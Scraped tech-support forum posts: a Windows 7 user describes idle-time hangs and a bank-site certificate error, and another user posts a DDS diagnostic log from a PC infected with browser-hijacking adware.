2015-08-11 09:20:42 2224640 ----a-w- C:\WINDOWS\System32\NetworkMobileSettings.dll
2015-08-11 09:20:02 483328 ----a-w- C:\WINDOWS\System32\OneDriveSettingSyncProvider.dll
2015-08-11 09:19:45 235520 ----a-w- C:\WINDOWS\System32\SettingsHandlers_Notifications.dll
2015-08-11 09:18:44 235008 ----a-w- C:\WINDOWS\System32\UserMgrProxy.dll
2015-08-11 09:16:32 2416640 ----a-w- C:\WINDOWS\System32\MFMediaEngine.dll
2015-08-11 09:14:02 404480 ----a-w- C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-08-11 09:13:42 413184 ----a-w- C:\WINDOWS\System32\diagtrack_win.dll
2015-08-11 09:11:40 2446336 ----a-w- C:\WINDOWS\System32\InputService.dll
2015-08-11 09:11:18 553472 ----a-w- C:\WINDOWS\System32\GamePanel.exe
2015-08-11 09:10:47 293376 ----a-w- C:\WINDOWS\System32\TextInputFramework.dll
2015-08-11 09:10:12 324096 ----a-w- C:\WINDOWS\System32\Windows.ApplicationModel.Store.TestingFramework.dll
2015-08-11 09:10:06 778752 ----a-w- C:\WINDOWS\System32\Windows.ApplicationModel.Store.dll
2015-08-11 09:09:55 32768 ----a-w- C:\WINDOWS\System32\wuautoappupdate.dll
2015-08-11 09:08:04 893440 ----a-w- C:\WINDOWS\System32\MbaeApiPublic.dll
2015-08-11 09:08:04 563200 ----a-w- C:\WINDOWS\System32\MbaeApi.dll
2015-08-11 09:07:52 593920 ----a-w- C:\WINDOWS\System32\wcmsvc.dll
2015-08-11 09:07:47 1178112 ----a-w- C:\WINDOWS\System32\wwansvc.dll
2015-08-11 09:07:44 115712 ----a-w- C:\WINDOWS\System32\MbaeParserTask.exe
2015-08-11 09:06:50 2662400 ----a-w- C:\WINDOWS\System32\Windows.UI.Logon.dll
2015-08-11 09:06:19 7523328 ----a-w- C:\WINDOWS\System32\Chakra.dll
2015-08-11 09:05:48 342016 ----a-w- C:\WINDOWS\System32\LocationGeofences.dll
2015-08-11 09:05:27 269312 ----a-w- C:\WINDOWS\System32\LocationFramework.dll
2015-08-11 09:05:23 78848 ----a-w- C:\WINDOWS\System32\LocationFrameworkInternalPS.dll
2015-08-11 09:05:20 137216 ----a-w- C:\WINDOWS\System32\LocationPermissions.dll
2015-08-11 09:05:10 996352 ----a-w- C:\WINDOWS\System32\RDXService.dll
2015-08-11 09:05:07 3527168 ----a-w- C:\WINDOWS\System32\tquery.dll
2015-08-11 09:03:09 2558976 ----a-w- C:\WINDOWS\System32\mssrch.dll
2015-08-11 09:02:53 186368 ----a-w- C:\WINDOWS\System32\cloudAP.dll
2015-08-11 09:02:15 621056 ----a-w- C:\WINDOWS\System32\enterprisecsps.dll
2015-08-11 09:02:08 3588096 ----a-w- C:\WINDOWS\System32\win32kfull.sys
2015-08-11 09:02:03 1890304 ----a-w- C:\WINDOWS\System32\dwmcore.dll
2015-08-11 09:01:38 1334784 ----a-w- C:\WINDOWS\System32\UIAutomationCore.dll
2015-08-11 09:00:45 336384 ----a-w- C:\WINDOWS\System32\SearchProtocolHost.exe
2015-08-11 09:00:06 274432 ----a-w- C:\WINDOWS\System32\syncutil.dll
2015-08-11 08:59:51 123392 ----a-w- C:\WINDOWS\System32\mssprxy.dll
2015-08-11 08:59:33 42496 ----a-w- C:\WINDOWS\SysWow64\tetheringclient.dll
2015-08-11 08:59:29 1106432 ----a-w- C:\WINDOWS\System32\sysmain.dll
2015-08-11 08:59:27 642560 ----a-w- C:\WINDOWS\System32\rdbui.dll
2015-08-11 08:58:11 372224 ----a-w- C:\WINDOWS\SysWow64\OneDriveSettingSyncProvider.dll
2015-08-11 08:57:51 13024768 ----a-w- C:\WINDOWS\SysWow64\Windows.UI.Xaml.dll
2015-08-11 08:57:12 159744 ----a-w- C:\WINDOWS\SysWow64\UserMgrProxy.dll
2015-08-11 08:51:35 1916928 ----a-w- C:\WINDOWS\SysWow64\MFMediaEngine.dll
2015-08-11 08:51:33 1823232 ----a-w- C:\WINDOWS\SysWow64\InputService.dll
2015-08-11 08:50:59 131584 ----a-w- C:\WINDOWS\SysWow64\Windows.UI.Core.TextInput.dll
2015-08-11 08:50:58 200704 ----a-w- C:\WINDOWS\SysWow64\TextInputFramework.dll
2015-08-11 08:50:47 420352 ----a-w- C:\WINDOWS\SysWow64\GamePanel.exe
2015-08-11 08:49:50 586752 ----a-w- C:\WINDOWS\SysWow64\Windows.ApplicationModel.Store.dll
2015-08-11 08:49:30 247808 ----a-w- C:\WINDOWS\SysWow64\Windows.ApplicationModel.Store.TestingFramework.dll
2015-08-11 08:48:25 671232 ----a-w- C:\WINDOWS\SysWow64\MbaeApiPublic.dll
2015-08-11 08:47:09 448512 ----a-w- C:\WINDOWS\SysWow64\MbaeApi.dll
2015-08-11 08:45:48 18805760 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2015-08-11 08:45:09 1820672 ----a-w- C:\WINDOWS\SysWow64\Windows.UI.Logon.dll
2015-08-11 08:43:39 2748416 ----a-w- C:\WINDOWS\SysWow64\tquery.dll
2015-08-11 08:42:33 5454848 ----a-w- C:\WINDOWS\SysWow64\Chakra.dll
2015-08-11 08:40:45 1593856 ----a-w- C:\WINDOWS\SysWow64\dwmcore.dll
2015-08-11 08:40:32 1964544 ----a-w- C:\WINDOWS\SysWow64\mssrch.dll
2015-08-11 08:40:12 1112064 ----a-w- C:\WINDOWS\SysWow64\UIAutomationCore.dll
2015-08-11 08:39:28 280576 ----a-w- C:\WINDOWS\SysWow64\SearchProtocolHost.exe
2015-08-11 08:38:43 162304 ----a-w- C:\WINDOWS\SysWow64\ReInfo.dll
2015-08-08 15:38:46 794088 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
2015-08-08 15:38:46 179688 ----a-w- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
2015-08-08 07:29:58 1822280 ----a-w- C:\WINDOWS\System32\ntdll.dll
2015-08-08 07:19:45 608936 ----a-w- C:\WINDOWS\System32\fontdrvhost.exe
2015-08-08 07:01:18 1533496 ----a-w- C:\WINDOWS\SysWow64\ntdll.dll
2015-08-08 06:48:13 539728 ----a-w- C:\WINDOWS\SysWow64\fontdrvhost.exe
2015-08-08 06:40:23 365056 ----a-w- C:\WINDOWS\System32\atmfd.dll
2015-08-08 06:24:15 2415104 ----a-w- C:\WINDOWS\System32\DWrite.dll
2015-08-08 06:24:06 1679360 ----a-w- C:\WINDOWS\System32\FntCache.dll
2015-08-08 06:15:14 303104 ----a-w- C:\WINDOWS\SysWow64\atmfd.dll
2015-08-08 06:00:44 1985024 ----a-w- C:\WINDOWS\SysWow64\DWrite.dll
2015-08-06 03:17:40 200528 ----a-w- C:\WINDOWS\System32\drivers\wof.sys
2015-08-06 03:17:34 237392 ----a-w- C:\WINDOWS\System32\drivers\rdyboost.sys
2015-08-06 02:22:03 685568 ----a-w- C:\WINDOWS\System32\drivers\WdiWiFi.sys
2015-08-05 04:49:51 783112 ----a-w- C:\WINDOWS\System32\mfsvr.dll
.
============= FINISH: 14:59:26.77 ===============


System hangs and other symptoms

Here is a post (mine) from the Microsoft 7 forum:

A hangup problem has developed on my Gateway Media Center (Win 7) machine. It has odd characteristics. The computer boots fine, and will run any program I choose, for as long as I choose. But if I let the machine sit for 10 minutes, it locks up. The mouse continues to work but no programs will boot, including shutdown.

If I boot into Safe mode, the computer works fine, for as long as I want to use it. IOW, it does NOT hang. Makes me think it might be a driver problem, altho, contrary to popular belief, Safe mode does load a lot of drivers.

I ran ESET on it several times. First time it found 96 infected files, which it deleted. Second time, it found nothing.

My gut feeling is, it's not a virus, but rather, a driver gone bad. I'm not smart enough to figure it out for sure, which is why I'm here. Appreciate your help.

Wes
Yesterday, 12:23 PM #2
joeten
Re: EMET, and hangups
Hi, have you tried a clean boot to troubleshoot? https://support.microsoft.com/en-gb/...?wa=wsignin1.0 Please read it fully first.
__________________
Eliminate all other factors, and the one which remains must be the truth.
Yesterday, 07:27 PM #3
Masterchiefxx17
Re: EMET, and hangups
Quote:
Originally Posted by WesNathan
Two questions:


Quote:
2. A hangup problem has developed on my Gateway Media Center (Win 7) machine. It has odd characteristics. The computer boots fine, and will run any program I choose, for as long as I choose. But if I let the machine sit for 10 minutes, it locks up. The mouse continues to work but no programs will boot, including shutdown.

If I boot into Safe mode, the computer works fine, for as long as I want to use it. IOW, it does NOT hang. Makes me think it might be a driver problem, altho, contrary to popular belief, Safe mode does load a lot of drivers.

I ran ESET on it several times. First time it found 96 infected files, which it deleted. Second time, it found nothing.

My gut feeling is, it's not a virus, but rather, a driver gone bad. I'm not smart enough to figure it out for sure, which is why I'm here. Appreciate your help.

Wes
It could be that your PC still has infected files. I recommend speaking with our malware team.



There is another symptom that worries me. When I try to access one of my banks' online banking sites, I get this message:

This Connection is Untrusted

You have asked Firefox to connect securely to onlinebanking.suntrust.com, but we can't confirm that your connection is secure.

Normally, when you try to connect securely, sites will present trusted identification to prove that you are going to the right place. However, this site's identity can't be verified.
What Should I Do?

If you usually connect to this site without problems, this error could mean that someone is trying to impersonate the site, and you shouldn't continue.

This site uses HTTP Strict Transport Security (HSTS) to specify that Firefox only connect to it securely. As a result, it is not possible to add an exception for this certificate.

onlinebanking.suntrust.com uses an invalid security certificate.

The certificate is not trusted because the issuer certificate is unknown.
The server might not be sending the appropriate intermediate certificates.
An additional root certificate may need to be imported.

(Error code: sec_error_unknown_issuer)


I've been using this site and the same logon info for many years, with never a problem. I can log into my other bank site without a problem.

I've been online today for several hours. The computer is running normally, with the exception of the bank login problem. I know, from recent experience, if I walk away for 10 minutes, the machine will lock up, requiring a reboot.

????

Help please! Computer is a mess

Hi,

My family's computer is a mess. Nothing on Chrome and IE will load, Firefox loads one page then there is a ton of pop ups and won't load anymore. It's sluggish. I've uninstalled programs that were obvious malware like Fast Clean Pro and ran the antivirus they had installed, as well as spybot search and destroy but it didn't make a difference. The Security Center won't turn on, and a lot of security updates failed to install. Please help! Thank you!


-----------------------------


DDS (Ver_2012-11-20.01) - NTFS_AMD64 NETWORK
Internet Explorer: 11.0.9600.17937 BrowserJavaVersion: 10.67.2
Run by Home at 20:56:59 on 2015-09-08
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.4061.3029 [GMT -4:00]
.
AV: Panda Free Antivirus *Enabled/Updated* {AAF74A68-8713-CDF1-004F-30003398BE9E}
SP: Panda Free Antivirus *Enabled/Updated* {1196AB8C-A129-C27F-3AFF-0B72481FF423}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Spybot - Search and Destroy *Enabled/Updated* {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
FW: Panda Firewall *Disabled* {92CCCB4D-CD7C-CCA9-2B10-9935CD4BF9E5}
.
============== Running Processes ===============
.
C:\windows\system32\lsm.exe
C:\windows\system32\svchost.exe -k DcomLaunch
C:\windows\system32\svchost.exe -k RPCSS
C:\windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\windows\system32\svchost.exe -k netsvcs
C:\windows\system32\svchost.exe -k LocalService
C:\windows\system32\svchost.exe -k NetworkService
C:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSUAService.exe
C:\windows\System32\svchost.exe -k secsvcs
C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSANHost.exe
C:\windows\Explorer.EXE
C:\windows\system32\ctfmon.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uProxyOverride = <local>;
mWinlogon: Userinit = C:\windows\SysWOW64\userinit.exe,
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Skype Click to Call for Internet Explorer: {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
uRunOnce: [BeginInteractiveOSUpgrade] C:\windows\System32\wuauclt.exe /BeginInteractiveOSUpgrade
mRun: [LenovoFSC] C:\Program Files (x86)\Lenovo\FanSpeedControl\LenovoFSC.exe
mRun: [jmekey] C:\Program Files (x86)\jmesoft\hotkey.exe
mRun: [UpdatePRCShortCut] "C:\Program Files\Lenovo\OneKey App\Lenovo Rescue System\MUITransfer\MUIStartMenu.exe" "C:\Program Files\Lenovo\OneKey App\Lenovo Rescue System" UpdateWithCreateOnce "Software\Lenovo\OneKey App\OneKey Recovery"
mRun: [Adobe Reader Speed Launcher] "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [fst_us_112] <no file>
dRunOnce: [panda4_2dn] reg.exe delete "HKCU\Software\AppDataLow\Software\panda4_2dn" /f
dRunOnce: [panda] reg.exe delete "HKCU\Software\AppDataLow\Software\panda" /f
dRunOnce: [panda_XP] reg.exe delete "HKCU\Software\panda" /f
StartupFolder: C:\Users\Home\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ADOBEG~1.LNK - C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: EnableLUA = dword:0
mPolicies-System: MaxGPOScriptWait = dword:600
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MIF5BA~1\Office12\EXCEL.EXE/3000
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office12\ONBttnIE.dll
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
.
INFO: HKCU has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
.
INFO: HKLM has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
TCP: NameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{05DDD59F-AFE1-4586-8FE2-20968752EA9F} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{20BD1366-DEB5-4A27-B5AA-29BA5B0684E0} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{60688BEE-3ED1-4DCC-88E5-05A8ABB6F224} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{8403AF2E-3BD8-49AB-9BAD-500FE5364A42} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{91E213B4-7FED-452F-AA6A-B48EDF65B269} : DHCPNameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{91E213B4-7FED-452F-AA6A-B48EDF65B269}\25B445A5B4 : DHCPNameServer = 192.168.1.1
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.85\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-mStart Page = hxxp://speedial.com/?f=1&a=spd_cmi_14_25_ch&cd=2XzuyEtN2Y1L1QzuyEyEtAyB0EyCtDzy0BtByCyE0EyC0E0CtN0D0Tzu0SzytDtAtN1L2XzutBtFtBtCtFyBtFtCtN1L1CzutCyEtBzytDyD1V1RtN1L1G1B1V1N2Y1L1Qzu2StB0AzyzztDyDzy0AtGyBzyyCyBtG0F0F0CyBtG0EyBzy0EtGtDyBtA0C0C0B0BzzyEyCtDyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCtA0AzztDzzyEyDtG0FtCyByBtG0Dzz0A0BtGzzzy0C0BtGtCtBtBzytA0FtAtAyBtBtDzy2Q&cr=504169009&ir=
x64-mSearch Page = about:blank
x64-mDefault_Page_URL = about:blank
x64-mDefault_Search_URL = about:blank
x64-mWinlogon: Userinit = C:\windows\SysWOW64\userinit.exe,
x64-BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Skype Click to Call for Internet Explorer: {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll
x64-Run: [IgfxTray] C:\windows\System32\igfxtray.exe
x64-Run: [HotKeysCmds] C:\windows\System32\hkcmd.exe
x64-Run: [Persistence] C:\windows\System32\igfxpers.exe
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
.
INFO: x64-HKLM has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
x64-Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
Hosts: 127.0.0.1 Spyware Info | Spyware Info
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Home\AppData\Roaming\Mozilla\Firefox\Profiles\qfe06vtf.default\
FF - prefs.js: browser.search.defaulturl -
FF - prefs.js: browser.search.selectedEngine - Vosteran
FF - prefs.js: browser.startup.homepage - hxxps://www.google.com/
FF - plugin: C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.0.5\npsitesafety.dll
FF - plugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\windows\SysWOW64\Adobe\Director\np32dsw.dll
FF - plugin: C:\windows\SysWOW64\Adobe\Director\np32dsw_1165635.dll
FF - plugin: C:\windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll
.
---- FIREFOX POLICIES ----
.
FF - user.js: extensions.nspdlsd.aflt - spd_cmi_14_25_ch
FF - user.js: extensions.nspdlsd.instlRef - 142905_c
FF - user.js: extensions.nspdlsd.cr - 504169009
FF - user.js: extensions.nspdlsd.cd - 2XzuyEtN2Y1L1QzuyEyEtAyB0EyCtDzy0BtByCyE0EyC0E0CtN0D0Tzu0SzytDtAtN1L2XzutBtFtBtCtFyBtFtCtN1L1CzutCyEtBzytDyD1V1RtN1L1G1B1V1N2Y1L1Qzu2StB0AzyzztDyDzy0AtGyBzyyCyBtG0F0F0CyBtG0EyBzy0EtGtDyBtA0C0C0B0BzzyEyCtDyC2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCtA0AzztDzzyEyDtG0FtCyByBtG0Dzz0A0BtGzzzy0C0BtGtCtBtBzytA0FtAtAyBtBtDzy2Q
.
.
.
.
FF - user.js: extensions.srchvstrn.hmpg - true
FF - user.js: extensions.srchvstrn.hmpgUrl - hxxp://Vosteran.com/?f=1&a=vst_secureddownload_14_52_ch&cd=2XzuyEtN2Y1L1QzuyEyEtAyB0EyCtDzy0BtByCyE0EyC0E0CtN0D0Tzu0StCtDzzyCtN1L2XzutAtFyCtFtCtDtFyBtN1L1CzutCyEtBzytDyD1V1RtN1L1G1B1V1N2Y1L1Qzu2SyB0D0FzytCyDtB0EtGtCyEzz0BtG0D0C0CyBtGtCtA0FyCtGyByEyBtD0F0DyEyEtA0D0FtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0A0D0EyD0C0DyE0DtG0Ezy0ByEtGyE0FyD0EtGzytBzyzytGyCyBtD0DtB0DyE0ByDyCtA0D2Q&cr=1408702106&ir=
FF - user.js: extensions.srchvstrn.dfltSrch - true
FF - user.js: extensions.srchvstrn.srchPrvdr - Vosteran
FF - user.js: extensions.srchvstrn.dnsErr - true
FF - user.js: extensions.srchvstrn_i.newTab - true
FF - user.js: extensions.srchvstrn.newTabUrl - hxxp://Vosteran.com/?f=2&a=vst_secureddownload_14_52_ch&cd=2XzuyEtN2Y1L1QzuyEyEtAyB0EyCtDzy0BtByCyE0EyC0E0CtN0D0Tzu0StCtDzzyCtN1L2XzutAtFyCtFtCtDtFyBtN1L1CzutCyEtBzytDyD1V1RtN1L1G1B1V1N2Y1L1Qzu2SyB0D0FzytCyDtB0EtGtCyEzz0BtG0D0C0CyBtGtCtA0FyCtGyByEyBtD0F0DyEyEtA0D0FtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0A0D0EyD0C0DyE0DtG0Ezy0ByEtGyE0FyD0EtGzytBzyzytGyCyBtD0DtB0DyE0ByDyCtA0D2Q&cr=1408702106&ir=
FF - user.js: extensions.srchvstrn.tlbrSrchUrl - hxxp://Vosteran.com/?f=3&a=vst_secureddownload_14_52_ch&cd=2XzuyEtN2Y1L1QzuyEyEtAyB0EyCtDzy0BtByCyE0EyC0E0CtN0D0Tzu0StCtDzzyCtN1L2XzutAtFyCtFtCtDtFyBtN1L1CzutCyEtBzytDyD1V1RtN1L1G1B1V1N2Y1L1Qzu2SyB0D0FzytCyDtB0EtGtCyEzz0BtG0D0C0CyBtGtCtA0FyCtGyByEyBtD0F0DyEyEtA0D0FtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0A0D0EyD0C0DyE0DtG0Ezy0ByEtGyE0FyD0EtGzytBzyzytGyCyBtD0DtB0DyE0ByDyCtA0D2Q&cr=1408702106&ir=&q=
FF - user.js: extensions.srchvstrn.id - 4437E609B264E6EC
FF - user.js: extensions.srchvstrn.instlDay - 16426
FF - user.js: extensions.srchvstrn.vrsn -
FF - user.js: extensions.srchvstrn.vrsni -
FF - user.js: extensions.srchvstrn_i.vrsnTs - 12:25:49
FF - user.js: extensions.srchvstrn.prtnrId - WSE_Vosteran
FF - user.js: extensions.srchvstrn.prdct - srchvstrn
FF - user.js: extensions.srchvstrn.aflt - vst_secureddownload_14_52_ch
FF - user.js: extensions.srchvstrn_i.smplGrp - none
FF - user.js: extensions.srchvstrn.tlbrId -
FF - user.js: extensions.srchvstrn.instlRef - 142905_c
FF - user.js: extensions.srchvstrn.dfltLng -
FF - user.js: extensions.srchvstrn.appId - {4CB3598A-82E8-4D1F-983F-061238AE696E}
FF - user.js: extensions.srchvstrn.excTlbr - false
FF - user.js: extensions.srchvstrn.cr - 1408702106
FF - user.js: extensions.srchvstrn.cd - 2XzuyEtN2Y1L1QzuyEyEtAyB0EyCtDzy0BtByCyE0EyC0E0CtN0D0Tzu0StCtDzzyCtN1L2XzutAtFyCtFtCtDtFyBtN1L1CzutCyEtBzytDyD1V1RtN1L1G1B1V1N2Y1L1Qzu2SyB0D0FzytCyDtB0EtGtCyEzz0BtG0D0C0CyBtGtCtA0FyCtGyByEyBtD0F0DyEyEtA0D0FtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0A0D0EyD0C0DyE0DtG0Ezy0ByEtGyE0FyD0EtGzytBzyzytGyCyBtD0DtB0DyE0ByDyCtA0D2Q
FF - user.js: extensions.srchvstrn.AL - 4
.
user_pref(extensions.autoDisableScopes,14);
============= SERVICES / DRIVERS ===============
.
R1 avgtp;avgtp;C:\windows\System32\drivers\avgtpx64.sys [2013-8-21 49952]
R1 NNSNAHSL;Network Activity Hook Server LightWeight Filter Driver;C:\windows\System32\drivers\NNSNAHSL.sys [2014-12-31 48400]
R2 NanoServiceMain;Panda Protection Service;C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSANHost.exe [2015-2-26 142584]
R2 PSUAService;Panda Product Service;C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSUAService.exe [2015-2-26 38136]
R3 RTL8167;Realtek 8167 NT Driver;C:\windows\System32\drivers\Rt64win7.sys [2010-9-15 215040]
S1 NNSALPC;NNSALPC;C:\windows\System32\drivers\NNSAlpc.sys [2015-2-9 93968]
S1 NNSHTTP;NNSHTTP;C:\windows\System32\drivers\NNSHttp.sys [2015-2-9 202000]
S1 NNSHTTPS;NNSHTTPS;C:\windows\System32\drivers\NNSHttps.sys [2015-2-9 110864]
S1 NNSIDS;NNSIDS;C:\windows\System32\drivers\NNSIds.sys [2015-2-9 116496]
S1 NNSPICC;NNSPICC;C:\windows\System32\drivers\NNSpicc.sys [2015-2-9 99600]
S1 NNSPIHSW;NNSPIHSW;C:\windows\System32\drivers\NNSPihsw.sys [2015-2-9 69904]
S1 NNSPOP3;NNSPOP3;C:\windows\System32\drivers\NNSPop3.sys [2015-2-9 124176]
S1 NNSPROT;NNSPROT;C:\windows\System32\drivers\NNSProt.sys [2015-2-9 299792]
S1 NNSPRV;NNSPRV;C:\windows\System32\drivers\NNSPrv.sys [2015-2-9 166160]
S1 NNSSMTP;NNSSMTP;C:\windows\System32\drivers\NNSSmtp.sys [2015-2-9 113424]
S1 NNSSTRM;NNSSTRM;C:\windows\System32\drivers\NNSStrm.sys [2015-2-9 257296]
S1 NNSTLSC;NNSTLSC;C:\windows\System32\drivers\NNStlsc.sys [2015-2-9 106256]
S1 PSINKNC;PSINKNC;C:\windows\System32\drivers\PSINKNC.sys [2015-2-25 197392]
S2 Apple Mobile Device Service;Apple Mobile Device Service;C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [2015-1-20 77128]
S2 c2cautoupdatesvc;Skype Click to Call Updater;C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [2015-5-1 1394816]
S2 c2cpnrsvc;Skype Click to Call PNR Service;C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [2015-5-1 1772672]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2014-4-12 103608]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2014-4-11 124088]
S2 LVPrcS64;Process Monitor;C:\Program Files\Common Files\LogiShrd\LVMVFM\LVPrcSrv.exe [2009-10-7 191000]
S2 panda_url_filteringService;panda_url_filtering Anti-Phishing Service;C:\ProgramData\Panda Security URL Filtering\Panda_URL_Filteringb.exe -- --> C:\ProgramData\Panda Security URL Filtering\Panda_URL_Filteringb.exe -- [?]
S2 PandaAgent;Panda Devices Agent;C:\Program Files (x86)\Panda Security\Panda Devices Agent\AgentSvc.exe [2014-10-9 66808]
S2 PSINAflt;PSINAflt;C:\windows\System32\drivers\PSINAflt.sys [2015-2-25 163088]
S2 PSINFile;PSINFile;C:\windows\System32\drivers\PSINFile.sys [2015-2-25 121616]
S2 PSINProc;PSINProc;C:\windows\System32\drivers\PSINProc.sys [2015-2-25 124176]
S2 PSINProt;PSINProt;C:\windows\System32\drivers\PSINProt.sys [2015-2-25 133904]
S2 PSINReg;PSINReg;C:\windows\System32\drivers\PSINReg.sys [2015-2-25 107792]
S2 SDScannerService;Spybot-S&D 2 Scanner Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [2013-8-21 1817560]
S2 SDUpdateService;Spybot-S&D 2 Updating Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2013-8-21 1033688]
S2 SDWSCService;Spybot-S&D 2 Security Center Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [2013-8-21 171928]
S2 ServiceUpdater;Network Support Service Updater;C:\windows\SysWOW64\netupdsrv.exe --> C:\windows\SysWOW64\netupdsrv.exe [?]
